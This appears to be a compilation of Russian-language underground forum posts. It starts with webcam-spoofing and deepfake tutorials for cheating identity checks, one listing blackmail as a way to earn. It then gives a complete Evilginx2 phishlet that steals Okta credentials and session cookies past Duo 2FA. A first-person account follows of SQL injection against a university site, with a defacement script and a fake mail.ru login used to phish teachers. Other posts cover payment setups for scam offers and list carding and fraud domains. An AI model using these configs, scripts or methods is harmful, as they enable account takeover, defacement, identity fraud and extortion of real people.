У нас появляется устройство /dev/video0 или цифра выше если у вас уже стояло что-то

2. Запускаем трансляцию изобразения в видео поток драйвера ffmpeg -loop 1 -r 1/5 -i "path_to_image" -c:v libx264 -vf fps=25 -vcodec rawvideo -pix_fmt yuv420p -threads 0 -f v4l2 /dev/video0

Указываем обязательно -loop 1 чтобы зациклить данное действие.

3. Ну теперь финальная стадия, это эмуляция,открываем Android Studio, открываем окно где редактируется виртуальная машина и в настройках камеры, выбираем наше виртуальное устройство,запускаем и разуемся жизни

Настраиваем gps под прописку и ищем чистый ip под город прописки!

МЕТОД 5

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
https://www.limontec.com/2018/02/deepfakes-criando-videos-porn-falsos.html - СТАТЬЯ

Настраиваем gps под прописку и ищем чистый ip под город прописки!

МЕТОД 6

Создания подмена камеры

https://github.com/corkami https://github.com/corkami/mitra

file1 first (top) input file.
file2 second (bottom) input file.

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--verbose verbose output.
-n, --nofile Don't write any file.
-f, --force Force file 2 as binary blob.
-o OUTDIR, --outdir OUTDIR
directory where to write polyglots.
-r, --reverse Try also with - in reverse order.
-s, --split split polyglots in separate files (off by
default).
--splitdir SPLITDIR directory for split payloads.
--pad PAD padd payloads in Kb (for expert).

Настраиваем gps под прописку и ищем чистый ip под город прописки!

МЕТОД 6

Для тех кто не мог пройти верификацию( а я знаю что таких много). Держите подгончик. Как никак Badoo один из лидеров по количеству мамонтов и дрочеров.
В Snapchat появился фильтр, меняющий пол. Эта фича позволяет с легкостью пройти верификацию на Badoo, а дальше - принимать дрочерский трафик и зарабатывать на нем всеми известными способами.

Необходимо открыть камеру в приложении, справа от кнопки «Сделать фото» есть раскрывающаяся галерея масок — нужные фильтры находятся там;
Среди «масок» есть две: одна с мужским лицом, другая с — женским. Это и есть фильтры «смены пола»;
После активации фильтра нужно выставить камеру так, чтобы лицо попало в границы «маски»;
Фильтр работает только в «живом» режиме, из галереи фото добавлять нельзя. Но можно переключиться на заднюю камеру и, к примеру, захватить лицо человека на фото.

Настраиваем gps под прописку и ищем чистый ip под город прописки!

МЕТОД 7

Для начала https://developer.nvidia.com/cuda-80-ga2-download-archive и устанавливаем CUDA 8.0

Установка стандартная, после перезагружаем. Патчить ничего не надо.

Скачиваем fakeapp

Скачиваем https://ffmpeg.zeranoe.com/builds/

ВАЖНО! ПОВТОРЯЕМ В ТОЧЬ ТОЧЬ!!!

Распаковываем FakeApp.zip в корень диск С. А так-же в корне диска С создаем папку fakes, внутри создаем папки data, data_A, data_B.

ffmpeg, распаковываем в папку FakeApp.

Получаем такую картину

Этап подготовки видео
Я загрузил видео с интервью Хлое Морец и теперь нужно на любом видеоредакторе нарезать участки видео с её лицом.

Сохраняем нарезанное видео в качестве 720p в папку C:\fakes\data_A называем её 1.mp4

Запускаем командную строку, пишем:
C:\FakeApp\ffmpeg\bin\ffmpeg.exe -i C:\fakes\data_A\1.mp4 -vf fps=25 "C:\fakes\data_A\out%d.png"

В папке C:\fakes\data_A видим как появляются картинки, ждем завершения процесса.

После завершения удаляем в папке C:\fakes\data_A видео 1.mp4

Запускаем fakeapp.bat в папке C:\FakeApp

Выбираем Align, поле Data указываем C:\fakes\data_A

Жмем Start.

ЖДЕМ ПОЛНОГО ЗАВЕРШЕНИЯ!

В папке C:\fakes\data_A появится папка aligned где все упорядочены её лица.

Этап номер два
Находим видео для друга и повторяем весь процесс, только вместо data_A указываем data_B. Главное видео для друга должно быть одно лицо, если лиц в кадре несколько, программа будет менять их все.

После того как в папке data_A и data_B появилась папка aligned с упорядоченными лицами переходим к тренировке. Этот процесс жопаболь, ибо уходит очень много времени для тренировки нейросети.

Переходим на вкладку Train

В поле Data A указываем путь C:\fakes\data_A\aligned

В поле Data B указываем путь C:\fakes\data_B\aligned

Жмем Start и ждем. Наблюдаем как постепенно нейросеть учится и качество фото улучшается. Если надоело ждать или качество вас устраивает, нажимаем клавишу Q, программа сохранит "весы" связей и можно будет в дальнейшем продолжить расчеты, ничего не теряется.

Нейросеть будет учиться примерно сутки на 1050ti.

Склеивать готовое видео не долго, по времени уходит максимум 1 час.

Варианты монетизации
Вебкам;
Шантаж;
Идентификация;
И т. д.
— прикручиваешь фотку клиентки к «голому телу» (мама я на вписке) и вежливо просишь оказать материальную помощь

— прикручиваешь фотку к видео и проходишь идентификацию в партнерках/сервисах

Настраиваем gps под прописку и ищем чистый ip под город прописки!

bitzlato

hodlhodl

paxful

bitpapa

cryptolocator

localcryptos

localcoinswap

garantex

Whitebait

Totalcoin

Chatex

Risex

Vertex

prizmBit

Bitcoinglobal

skyBTCbanker

SkyCrypto

monabey

bisg

Localmonero

AgoraDesk

И другие

Всем привет!

Бывают случаи, когда тебе нужно кого-то зафишить. Бывает, когда у целевой организации настроен второй фактор для аутентификации — sms, Google authenticator, Duo. Что делать в таких случаях? Нанимать гопников? Подрезать телефоны у сотрудников? Нет! Оказывается, хитрые хакеры написали софт, способный помочь в этой непростой ситуации.

Evilginx2 — фреймворк для фишинга, работающий как прокси между жертвой и сайтом, учетки от которого мы хотим получить. Раньше он использовал кастомный nginx, теперь же полностью переписан на Go, включает в себя мини HTTP и DNS серверы, что сильно облегчает установку и развертывание.

Как это работает? Автор софта подробно [описал](https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa- tokens/) на своем сайте, детали по установке и настройке можно найти на github странице проекта. Почему же удается обойти второй фактор? Фишка в том, что мы не вмешиваемся в процесс ввода кода из смс / временного пароля / пуша от DUO. Мы тихо ждем, пока пользователь успешно пройдет все шаги аутентификации, ловим его куку, и уже ее используем для входа. Попутно на всякий случай собираем его логин и пароль. В этой же заметке я расскажу о своем опыте и подводных камнях, с которыми столкнулся.

Задача

Итак, нам нужно зафишить контору, которая активно использует Okta как Single Sign-on. В качестве второго фактора используется Duo — решение, фишка которого в мобильном клиенте, позволяющем подтверждать второй фактор через обычные пуш-нотификации вместо ввода 35-значных кодов (привет Google Authenticator). Приступим.

Шаг первый — регистрируем фишинговый домен

В панели нашего провайдера указываем адрес сервера, на котором будет расположен фишинг. Также регистрируем поддомен вида okta.<фишинговый домен>.com.

Шаг второй — настраиваем Evilginx

Запускаем Evilginx и через команду config вводим необходимые настройки. Указываем основной домен (не поддомен) и его IP.

Code:Copy to clipboard

config domain <фишинговый домен>.com

config ip 10.0.0.1

В итоге конфиг выглядит так:

Интересен тут параметр redirect_url — он указывает куда перенаправлять запрос, когда клиент пришел в корень нашего домена. Зачем это сделано? Если отдавать фишинговую страницу из корня, домен очень быстро вычислят и внесут в списки опасных сайтов, браузеры будут грозно ругаться, и пользователи никогда к нам не попадут. Поэтому мы ее будем отдавать по уникальной ссылке, а корень будет перенаправлять на песню Never Gonna Give You Up.

Шаг третий — настраиваем фишинговую страницу

Тут начинается самое интересное. Так как по-факту на нашем сервере мы вообще не хостим никакого контента, а только проксируем запросы, нам нужно "рассказать" Evilginx, какие именно данные мы хотим получить. Этот "рассказ" мы пишем в специальном формате. Документация по нему доступна на [wiki](https://github.com/kgretzky/evilginx2/wiki/Phishlet-File- Format-(2.2.0)) странице проекта. Называются эти описания phishlets. Для некоторых популярных сервисов — facebook, linkedin, amazon они уже написаны и включены в дистрибутив. Нам повезло меньше, из коробки Okta не поддерживается, но добрые люди написали phishlet для старой версии. Берем напильник и начинаем паять.

Заполняем описание, указываем имя phishlet, авторов, и требуемую версию Evilginx.

Code:Copy to clipboard

name: 'okta'
author: '@ml_siegel, updated by @hollow1'
min_ver: '2.2.0'

Указываем, какой именно домен собираемся фишить. В нашем случае используется домен вида <имя целевой компании>.okta.com

Code:Copy to clipboard

proxy_hosts:
  - {phish_sub: '', orig_sub: '<поддомен имя целевой компании>', domain: 'okta.com', session: true, is_landing: true}

Параметр session указывает на то, что именно этот домен отдает нужные нам куки и туда передаются учетные данные, is_landing значит что этот хост будет использоваться для генерации фишинговых URL.

Следующий важный этап — определить все запросы к целевому домену, для того чтобы прокси успешно их переписала на фишинговый домен. Если этого не сделать, пользователь будет отправлять данные не нам, а сразу на оригинальный домен, и никаких учеток мы не поймаем. Переписывать нужно только те запросы, которые непосредственно участвуют в процессе входа пользователя на сайт.

Чтобы четко понимать, что именно требуется для успешной аутентификации, нужно внимательно этот самый процесс изучить. Вооружившись Burp и тестовой учеткой начинаем искать как передается пароль и по каким кукам приложение определяет авторизованного пользователя. Также ищем ответы от сервера, в которых есть ссылки на оригинальный домен.

Находим запрос, в котором передается логин и пароль. Видим что он шлется на оригинальный домен, а нужно чтобы уходил нам.

Вот здесь видно, как оригинальный домен отдает ссылки внутри javascript, их нужно переписать.

Собрав это и еще пару запросов получаем следующие настройки:

Code:Copy to clipboard

sub_filters:
  - {triggers_on: '<целевой домен>.okta.com', orig_sub: '<целевой домен>', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'login.okta.com', orig_sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
  - {triggers_on: '<целевой домен>.okta.com', orig_sub: '', domain: '<целевой домен>.okta.com', search: 'https\\x3A\\x2F\\x2F{hostname}', replace: 'https\x3A\x2F\x2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
  - {triggers_on: '<целевой домен>.okta.com', orig_sub: '', domain: '<целевой домен>.okta.com', search: '\\x2Fuser\\x2Fnotifications', replace: 'https\x3A\x2F\x2F<целевой домен>.okta.com\x2Fuser\x2Fnotifications', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}

Ключевое слово {hostname} как раз используется для замены оригинального домена на фишинговый. Подробнее о синтаксисе этой секции написано [тут](https://github.com/kgretzky/evilginx2/wiki/Phishlet-File- Format-(2.2.0)#sub_filters).

Помните, нам нужны куки, с которыми мы будем авторизоваться на сайте. Путем проб и ошибок выясняем имя куки — sid , и дописываем его в настройки:

Code:Copy to clipboard

auth_tokens:
  - domain: '<целевой домен>.okta.com'
    keys: ['sid']

Также нам пригодится логин и пароль пользователя, мы уже нашли запрос, в котором они передаются. Как видно в запросе, нужные нам параметры username и password передаются в json, дописываем:

Code:Copy to clipboard

credentials:
  username:
    key: 'username'
    search: '"username":"([^"]*)'
    type: 'json'
  password:
    key: 'password'
    search: '"password":"([^"]*)'
    type: 'json'

Так Evilginx сможет вычленять их из запросов и корректно сохранять.

Осталось немного. Укажем URL страницы логина на целевом домене.

Code:Copy to clipboard

landing_path:
  - '/login/login.htm'

Укажем URL, по которому мы поймем, что пользователь успешно авторизован.

Code:Copy to clipboard

auth_urls:
  - 'app/UserHome'

Вот и все! Конфиг целиком:

Code:Copy to clipboard

name: 'okta'
author: '@ml_siegel, updated by @hollow1'
min_ver: '2.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '<поддомен имя целевой компании>'', domain: 'okta.com', session: true, is_landing: true}
sub_filters:
sub_filters:
  - {triggers_on: '<целевой домен>.okta.com', orig_sub: '<целевой домен>', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']}
  - {triggers_on: 'login.okta.com', orig_sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
  - {triggers_on: '<целевой домен>.okta.com', orig_sub: '', domain: '<целевой домен>.okta.com', search: 'https\\x3A\\x2F\\x2F{hostname}', replace: 'https\x3A\x2F\x2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
  - {triggers_on: '<целевой домен>.okta.com', orig_sub: '', domain: '<целевой домен>.okta.com', search: '\\x2Fuser\\x2Fnotifications', replace: 'https\x3A\x2F\x2F<целевой домен>.okta.com\x2Fuser\x2Fnotifications', mimes: ['text/html', 'application/json', 'application/x-javascript', 'text/javascript']}
  - domain: '<целевой подомен>.okta.com'
    keys: ['sid']
credentials:
  username:
    key: 'username'
    search: '"username":"([^"]*)'
    type: 'json'
  password:
    key: 'password'
    search: '"password":"([^"]*)'
    type: 'json'
landing_path:
  - '/login/login.htm'
auth_urls:
  - 'app/UserHome'

Сохраняем его как okta.yaml в /usr/share/evilginx/phishlets.

Шаг четвертый — включаем наш новый фишинг

Запускаем evilginx и пишем команду

phishlets hostname okta okta.<наш фишинговый домен>.com

Click to expand...

Включаем phishlet

phishlets enable okta

Click to expand...

Под него автоматически создается сертификат от LetsEncrypt.
Проверяем настройки:

Указываем, куда будем редиректить пользователя после успешной авторизации

phishlets get-url okta https://<целевой домен>.okta.com/

Click to expand...

Приложение выдаст ссылку, которую нужно рассылать пользователям, вида https://<фишинговый домен>.com/login/login.htm?rb=9ffe&ec=<уникальный хеш>

Шаг 4 — ждем улов

Рассылаем письма (технологии рассылки — материал для отдельной статьи) и ждем.
Неокрепший доверчивый пользователь идет по ссылке и авторизуется.

Все пойманные учетки складываются в sessions. Выбираем нужную и копируем из нее куки:

Открываем бразуер, подставляем куки и вуаля — мы внутри!

Послесловие

Evilginx сильно упрощает создание фишинговых страниц, особенно для 2FA. Также эти страницы удобно хранить и делиться ими с друзьями. Способы защиты — использование девайсов стандарта U2F, переход на новые методы аутентификации.

Что думаете об описанном подходе? Как собираете учетки вы?

Оригинал статьи тут
Добавлю от себя. Оттестил, и это сука работает! Всем удачи! :smile8:

Что будет если не отдать кредит на ВМ?

У меня встал вопрос. Подскажите есть ли какое-то приложение для удаленного управления android "из коробки"? Без включения рут прав или отладки по USB. Подходит любое решение типа тимки, энидеска, эйрдроида и прочих, но во всех вышеупомянутых софтинах именно для управления, а не просто демонстрации экрана, нужно либо включать рут права, либо подключать девайс к ПК, запускать отладку по USB и тд, что максимально мешает. Если есть такое же решение под iOS будет вдвойне шикарно (сильно много хочу, знаю).
Тапками не кидаемся, если не увидел решение у себя под носом. Спасибо.

P.S. дополню описание тем, что нужен не скрытое управление или бот, достаточно вполне легальной софтины, которую человек сознательно устанавливает.

Не уверен что создал тему в нужном разделе. Просьба к АГ перенести, а не удалять, если что

Добрый день, уважаемые форумчане. То что вы сейчас прочтете, возможно будет похоже на какой-то художественный фильм про хакинг пентагона, но это реальная история, которая случилась со мной совсем недавно.

С чего всё начиналось ​

По календарю ноябрь провожал мой нелегкий первый год в университете. Зачеты, экзамены, сессии, казалось до них было далеко, но, однокурсники с каждым днем стали чаще напоминать мне об этой суете, так как, баллы у меня были самые низкие (кроме информатики ). Официальный сайт нашего университета почти не был защищен: небезопасный протокол HTTP, куча SQL инъекций и XSS. С помощью одной из этих уязвимостей, мне потребовалось 10 минут для взлома сайта. А точнее, это была очередная SQL инъекция, которая позволила мне получить все данные для входа в панель управления. Пароли не были зашифрованные, из-за чего моя задача облегчалась в несколько раз. Зашел на панель, посмотрел что-там, и понял что там можно изменить инфу только с этого домена. К моему сожалению, там и речи не было о БРС (балльно рейтинговая система), так как он находился на поддомене, и к моему удивлению, имел совсем другой IP адрес. Мое незнание сети привело меня к выводу, что сеть университета немного запутана, и чтобы получить доступ к БРС, придется действовать другим методом. Конечно же, я не мог просто оставить взломанный сайт без изменений, и вместо того чтобы вручную менять каждую публикацию, я внимательно посмотрел все параметры которые передаются по POST запросу, и написал питон скрипт, который раз за разом отправлял POST запросы на все адреса, которые нужны были для изменения публикаций. Если расписывать каждый шаг, получится очень много теории, поэтому приведу вам видео-ролик, который я записал в ночь взлома.

​

И так. Для того чтобы менять какую-то публикацию, естественно нужно было войти на панель управления. Но, на входе меня ожидала одна проблема - капча, которую я так и не смог решить. После нескольких неудачных попыток, пришло в голову сделать это совсем по другому. Как вы знаете, при смене кукисов на валидные, мы без каких-либо вводов паролей и решений капч, могли оказаться в панели. Именно так я и сделал, благодаря параметру cookies из нашего любимой библиотеки requests, которая указывалась при отправке запроса. Запустив скрипт и указав валидную PHPSESSID, начиналось шоу. Приведу немного измененный пример кода, дабы избавиться от некоторых вопросов

Python:Copy to clipboard

import requests
import os
import sys
import time
class color:
   PURPLE = '\033[95m'
   CYAN = '\033[96m'
   DARKCYAN = '\033[36m'
   BLUE = '\033[94m'
   GREEN = '\033[92m'
   YELLOW = '\033[93m'
   RED = '\033[91m'
   BOLD = '\033[1m'
   UNDERLINE = '\033[4m'
   END = '\033[0m'
print("Secret key:")
sessid = input()
time.sleep(1)
print(color.BOLD + "Successfully key confirmation! \n" + color.END)
time.sleep(2)
print("Sending requests...\n")
time.sleep(3)
s = requests.Session()
urls = ["http://site.ru/edit1.php?id=", "http://site.ru/edit2.php?id=",, "http://site.ru/edit3.php?id=", "http://site.ru/edit4.php?id=", "http://site.ru/edit5.php?id="]
cookies = {'PHPSESSID': sessid, 'ckCsrfToken' : '29iurhXaHn4B80ED9466L85OooV6fyo1wL7K850p'}
date = "2019-07-07"
text = """
<html> <h1 align="center">HACKED BY VASYA PUPKIN</html>
"""
title = "HACKED"
pre_text = "HACKED"
files = {
    'userfile': (os.getcwd()+'/main.png', open(os.getcwd()+'/main.png', 'rb'), 'image/png')
}
link = "https://www.whoismrrobot.com/"
other = "СоÑÑаниÑÑ Ð¸Ð·Ð¼ÐµÐ½ÐµÐ½Ð¸Ñ"
for num in range(0,4):
    for i in range(0,300):
        r = s.post(urls[num]+str(i), files=files, cookies = cookies, data={'title' : title, 'text' : text, 'date' : date, 'pre-text' : pre_text, 'do_edit' : other, 'date_end' : date, 'category' : 6, 'link' : link})
        print(color.BOLD +"Publication with ID " + str(i) + " defaced!" + color.END)
        time.sleep(0.05)

end = """
████████████████████████████████████
█─██─██────██────██─██─██───██────██
█─██─██─██─██─██─██─█─███─████─██──█
█────██────██─█████──████───██─██──█
█─██─██─██─██─██─██─█─███─████─██──█
█─██─██─██─██────██─██─██───██────██
████████████████████████████████████
        ██████████████
      █────███──█──█
      █─██──███───██
      █────█████─███
      █─██──████─███
      █────█████─███
      ██████████─███
████████████████████████████████████
█────██──█──██────██───██────██────█
█─██─███───█████──████─██─██─██─██─█
█─██─████─█████──███───██────██─██─█
█─██─███───███──██████─██─█─███─██─█
█────██──█──██────██───██─█─███────█
████████████████████████████████████
"""
print(end)

Те, кто знает хотя бы базу питона, поймут что для чего. Почему хотя бы? Да потому-что я сам знаю не больше xD.

Идем к большой цели маленькими шагами ​

Сайт взломан, видео залито, слухи ходят. Казалось бы, цель достигнута, но, наш злорадствующий смех, говорит, что это была всего лишь разминка. Итак, сканировав поддомен БРС на наличие уязвимостей, как автоматическим, так и ручным способом, я пришел к выводу, что эта часть сайта хорошо защищена. Несмотря на это, я всё верил что разработчики допустили хоть какую-то мелочь, и стал прочесывать сайт с помощью Dirb. К нашему сожалению, это не дало никакого результата. Но, я все равно не хотел сдаваться. Думаю и так понятно, что у каждого преподавателя есть отдельный аккаунт в БРС. Поэтому, нам нужно было получить доступ сразу к нескольким аккаунтам в БРС, или, буду честен, к аккаунтам преподавателей, которые ставят мне слишком низкие баллы xD. Буквально у всех, были айфоны. А мы знаем, что яблоко не подпускает к себе любых недобрых приложений. Поэтому, достичь цели с помощью запуска вируса на телефоне, было вычтено из списка вариантов. И тут я вспомнил про любимую СИ (Социальная инженерия). Слишком много текста, чувствуете? Ничего, это того стоит. Данные для входа в БРС каждому преподавателю отправляли на почту индивидуально. Я не стал много раздумывать, и пошел сделать фишинг-страницу, похожую на страницу входа mail.ru. Получилось что-то подобное

​

После нажатия кнопки Войти, данные отправлялись нам, а пользователя направляло на главную страницу почты. В прикрепленных файлах оставлю исходники кода, может кто захочет повторить трюк. Немного изменив свой почтовый ящик под аккаунт Администрации, я пошел писать письмо. В этом мне очень помог всеми известный хабр (не реклама). В итоге, у меня получилось вот это

​

Ссылка "Подтвердить" отправляла нас на нашу фишинг страницу. Адрес был примерно следующим: http://myhost.ru/?emai=prepod7@mail.ru
В index.php нашей страницы, я сделал так, чтобы значение из GET параметра email сохранялось в сессии, так, чтобы при обновлении страницы все равно отображался первоначальный email. Сделано было это для красоты. Итак, всё готово, осталось ждать пока жертва клюнет. Я подключился к серверу по SSH и стал слушать файл лога с помощью команды tail -f data.txt и пошел спать. Просыпаюсь утром, увидев что лог пуст, я с грустью пошел готовиться к универу. Буквально через 30 минут, я вернулся чтобы посмотреть, не случилось ли чудо. Эххх, вы бы видели мое лицо, когда мой терминал выдал мне логин и пароль для входа в почту преподавателя. Радости не было конца. То ли преподаватель совсем не был знаком с ИБ, то ли не выспался, но я получил пароль. До начала занятий был минимум час, и это позволило мне копать почту. Кол-во писем было там, 3000+, если не больше. У меня бы ушли возможно дни, если б искал нужное письмо в ручную. Благо, кому-то пришло в голову сделать автоматический поиск писем, чем я и воспользовался. Немного пролистав ключевые письма, я нашел именно то письмо, где сообщались данные для входа в БРС. Это была победа.

​

P.S. Прошу строго не судить, всё было написано и сделано на собственных понятиях. Если где-то допустил ошибку, буду только рад исправлению.

Всем спасибо за внимание! ​

Давно сижу в чатах спамеров, всем извесно что они льют на серые офферы, и в этих чатах часто поднимался один и тот же вопрос - "а почему бы нам не поднять свой приватный оффер?" и всегда эта инициатива упиралась в платежную систему. Собственно сам вопрос: как можно подключить платежку по картам на свой лохотрон, без услуг агрегатора который забанит после 2-х жалоб, да так чтобы она не отваливалась и опять же чтобы ее не заблокировали?
В данном случае вопрос распространяется не только на СЕРЫЕ офферы, но на вообще любые лохотроны.

http://habrahabr.ru/blogs/infosecurity/68131/
и как их за жопу не берут?

Новый спам:

ППривеет! помоги выиграть ноутбук. Конкурс Party Fire 2009. Отправь
за меня смску с текстом id16111175 на номер 2090. Она стоит 7рублей.
Я уже на 2м месте)))))) Помоги плз... заранее огромное спасибо. Я в
долгу не останусь!

Click to expand...

Не попадайтесь чел накручивает рейтинг в контакте, думаю уже через пару дней его акк будет заблокирован

**1. "Ошибки" в платежных системах. **
Это распространенный вид "халявы" и состоит в том, что жертве сообщают о том, что в некоей платежной системе X обнаружена уязвимость, позволяющая извлекать прибыль. Далее идет описание сути уязвимости и предлагается рецепт заработка, состоящий как правило в отправке некоторой суммы денег на "магический" кошелек с сопутствующими шаманскими действиями. Обещается, что после перевода через некоторое время деньги вернутся в удвоенном (утроенном ...) виде
Реальность: "магический" кошелек принадлежит мошенникам и после перевода на него денег естественно ничего обратно не вернется. И пожаловаться пострадавший не сможет (представьте заявление в милицию "я пытался взломать платежную систему и в результате лишился денег"
2. Утилиты для взлома платежных систем.
Жертве предлагается некоторый генератор номеров кредитных карт, систему для скрытного списания денег с чужих счетов/кошельков и т.п. Ключевой момент - для работы этого генератора необходимо ввести номер своей карты/кошелька и пароль. Часто такие программы идут с детальной справкой и может быть описано, что программа платная и бесплатно можно "взломать" только 1-3 счета
Реальность: введенные данные передаются злоумышленникам и жертва теряет то, что было на счете или в электронном кошельке
3. Генераторы кодов карт систем оплаты сотовой связи или Интернет.
Идея аналогична п.п. 2, но в "генератор кодов" предлагается ввести код неактивированной карты, который послужит своего рода образцом для "размножения". Часто такие программы идут с детальной справкой и может быть описано, что программа платная и бесплатно можно "взломать" только 1-3 карты оплаты
Реальность: введенные данные передаются злоумышленникам, а программа начинает имитировать бурный процесс вычислений. Идея обмана - нужно ввести код неактивированной карты. Получивший его злоумышленник активирует карту и потерпевшие собственно оказывается в дураках
4. Системы заработка на основе просмотра некоторой рекламы. Идея метода - пользователю предлагается
4.1 Установить программу X, которая будет отображать рекламу, за просмотр которой пользовал будет получать некоторые деньги
4.2 Держать открытой некую страницу, на которой крутится рекламная информация
4.3 Ходить по каким-то страницам с рекламой и "собирать бонусы"
Обычно пользователю предлагаются золотые горы и заработок в сотни баксов в месяц
Часто пользователю предлагается некая партнерская программа, предполагающая получение денег из прибыли партнеров и (или) бонусов за их регистрацию
Реальность: Обычно в всех таких систем есть некий минимальный порог (например, 30-50$) для снятия денег. А насобирать эти самые деньги весьма сложно - долго собирать придется, так как за факт просмотра платится очень небольшая копеечка. Обычно любитель халявы регистрируется, возится с этой штукой некоторое время и потом плюет (время между регистрацией и плевание - по статистике от часа до недели). А снять заработанные за это время центы (или даже доллары) он не может... Т.е. в итоге он смотрит рекламу даром . А если трафик не безлимитный и вычислить его стоимость, то окажется, что вместо прибыли данная штука приносит убыток. Кроме того, в корпоративной среде постоянные обращения служебного ПК в Интернет могут заинтересовать службу безопасности со всеми вытекающими для пользователя последствиями.
5. Партнерская программа систем заработка на основе просмотра некоторой рекламы.
Идея метода - п.п. 4 + партнерская программа, предполагающая некоторые бонусы за привлечение рефераллов и процент от их заработка
Реальность: Чтобы от нее получить некоторую прибыль, нужно активно изыскивать рефераллов - получается принцип пирамиды. Обычно желающий стать миллионером любитель халявы ведет очень агрессивный поиск рефераллов - распихивает во все доступные конференции/блоки/гостевые книги описания "метода легкого заработка", создает на бесплатных хостингах кучу страниц под рубрикой "халява", рассылает спам с красочным описанием методики и т.п. Общий признак - дается не просто ссылка на систему такового заработка, а ссылка с партнерским ID. Понятно дело, что заработать что-то может некто, находящийся наверху пирамиды
6. "Секретные материалы".
Суть метода - пользователю предлагается купить некое руководство, материалы которого помогут ему бесплатно пользоваться мобильной связью, электроэнергией, получить халявный Интернет и т.п. - корочего говоря, содержит "инструкции по получению халявы".
Реальность: Если таковое руководство и существует в реальности, то имеющиеся там "рецепты" как правило давно и бесплатно находятся в Интернет. Более того, работоспособность подобных методик весьма сомнительна, а пожаловаться пользователь естественно никому не может

Источник: virusinfo

на этих сайтах обитают "нехорошие" личности. =)

100ballov.ru
101-101-3.ru
18baksmobile.nm.ru
21er.ru
2-ru.net
495.isgreat.tv
4card.net
50percents.com
5days.ru
62033.net.ru
62033.ru
a-diplom.com
adnet.ru
alcor-mobile.ru
aleand.by.ru
alexlabutin.narod.ru
alkor-digital.com
alkor-m.com
alkorshop.com
all-laptops.com
allmoneyback.com
alom.ru
altprom.su
amro.boom.ru
amv.boom.ru
angelfire.com/amiga2/coolgoods
apparatura.net
aqueena.info
arpcheap.com
asartwin.narod.ru
atestats.narod.ru
attestat.net
autoprava.info
autoremont.su
avk-3.greenline.ru
axtech.net
bandesign.ru
bankforex.com
bankforex.ru
baza.5gigs.com
bb-co.narod.ru
beeconverter.narod.ru
beegen.nm.ru
beeline5.h15.ru
bestdiplom.ru
bestelefon.narod.ru
bestmobil.com
betmarket.tut.ru
bets-search.nm.ru
bezagentov.narod.ru
bezlimitka.com
bigprocent.tk
bis.s5.com
bis.s5.com
bisness-rospr.narod.ru
bizbiz.narod.ru
bizgarant.ru
biznesgarant.ru
boardmaster.ru
bobofon.ru
booster100.ru
bptipr.com
bptipr.ru
bumagi.com
buyphones.org.ru
call-free.org
cardermobile.org
carderproduct.biz.ly
carderproduct.com
carderproduct.net
carderproduct.org
carderproduct.wagoo.com
carders.h15.ru
carders.siteburg.com
carders0.hostonfly.ru
cardersota.org
carder-shop.nm.ru
carder-stock.com
carder-stock.fatal.ru
cardgoods.com
carding.bravehost.com
carding.fromru.com
cardingservice.nxt.ru
cardingshop.land.ru
card-market.biz
card-market.biz
card-s.nm.ru
cardzzz.biz
cc-goods.net
ccshop.biz
ccshop.pbnet.ru
cctovar.com
cc-world.ws
cd-opt.ru
cdstalker.ru
ceziy-gsm.narod.ru
ch31.narod.ru
change-investing.com
cheapshop.ru
chemistry.nm.ru
clx.ru
commandos.coolwebprofits.com
conf-gsm.narod.ru
confis.jino-net.ru
confiscat2006.narod.ru
confiscatsellout.com
conntmn.narod.ru
coolwebprofits.com
creditgoods.com
cvv.ru
cvv2.ru
cyberdengi.biz
cyberdengi.com
cyberjob.us
cycle-profitm.narod.ru
datacable.ru
departament.ru
deshevo.biz
deshevo.boom.ru
dettrax.narod.ru
devochki.ru
dgun.ru diamondprofit.com
digitalphone.ru
digitron.ru
dip4sale.chat.ru
diplom.net.ru
diplom.pp.ru
diplomic.ru
diplomov.net
diplomov.ru
diplomru.ru
diploms.net
diplomsss.chat.ru
diplomy.com
dipo.ru
doconline.ru
doc-rf.narod.ru
dokfactory.com
dokument.hut2.ru
dokumentov.net
dolche-mobile.ru
domohost.ru
dostavkalinz.ru
dostupno.com
dsl-market.net
e38.250free.com
e38.biz
e38pts.boxmail.biz
easy-mob.com
ecommtools.com
edollarhyip.com
eg2003.narod.ru
eg-2003.narod.ru
ege.by.ru
ege.com.ru
ege.net.ru
ege03.narod.ru
ege2003.h10.ru
ege5.narod.ru
egelen.narod.ru
egetest.by.ru
e-goldsbors.narod.ru
eicorporation.com
ekzamen.by.ru
enigma-samara.nm.ru
eon.xost.ru
e-pay.com.ru
epay-center.com
eservis.ru
e-shop2.narod.ru
espera.ru
eurocarding.com
eurokonf.com
euronetforex.com
european-nation.org
europromexport.com
eurotexno.com
evrophone.narod.ru
evroznak-dokument.narod.ru
examen-russia.com
examine.h1.ru
exem.ru
fcicorpru.com
fexa.net
ff-bank.net
finbetting.info
flamingo.ru
fond.yard.ru
foreign-fund.com
forexmasterbank.com
forexstock.org
forexwebmoney.com
free-calls.org
freegoods.sbn.bz
free-gsm.org
freegsm.ru
free-gsm-call.net
freegsmcalls.com
free-gsm-calls.net
free-gsm-calls.org
free-mob.com
free-mob.com.ru
free-mobil.nm.ru
freemobilephone.mail15.com
freeport.nm.ru
freesota.com
freesota.net
freesota.org
freesota.ru
freesotik.com
freetechgoods.net
from-usa.net
fsbinfo.com
fsbru.250free.com
fsbzakaz.narod.ru
ftf.com
ftf.ru
fxbt.com
geocities.com/callsforfree
gift.newmail.ru
giftomania.ru
giza777.narod.ru
gold-club-international.com
gold-timer.com
good-living.biz
goods4rus.net
gorcom.com/e
gprsmanager.narod.ru
gsm4all.boom.ru
gsmfree.org
gsmfreeonline.com
gsm-hack.com
gsm-hack.org
gsmkonfiskat.narod.ru
gsm-pcs.com
gsm-service.net
gsmsoft.net.ru
gsm-unlimited.narod.ru
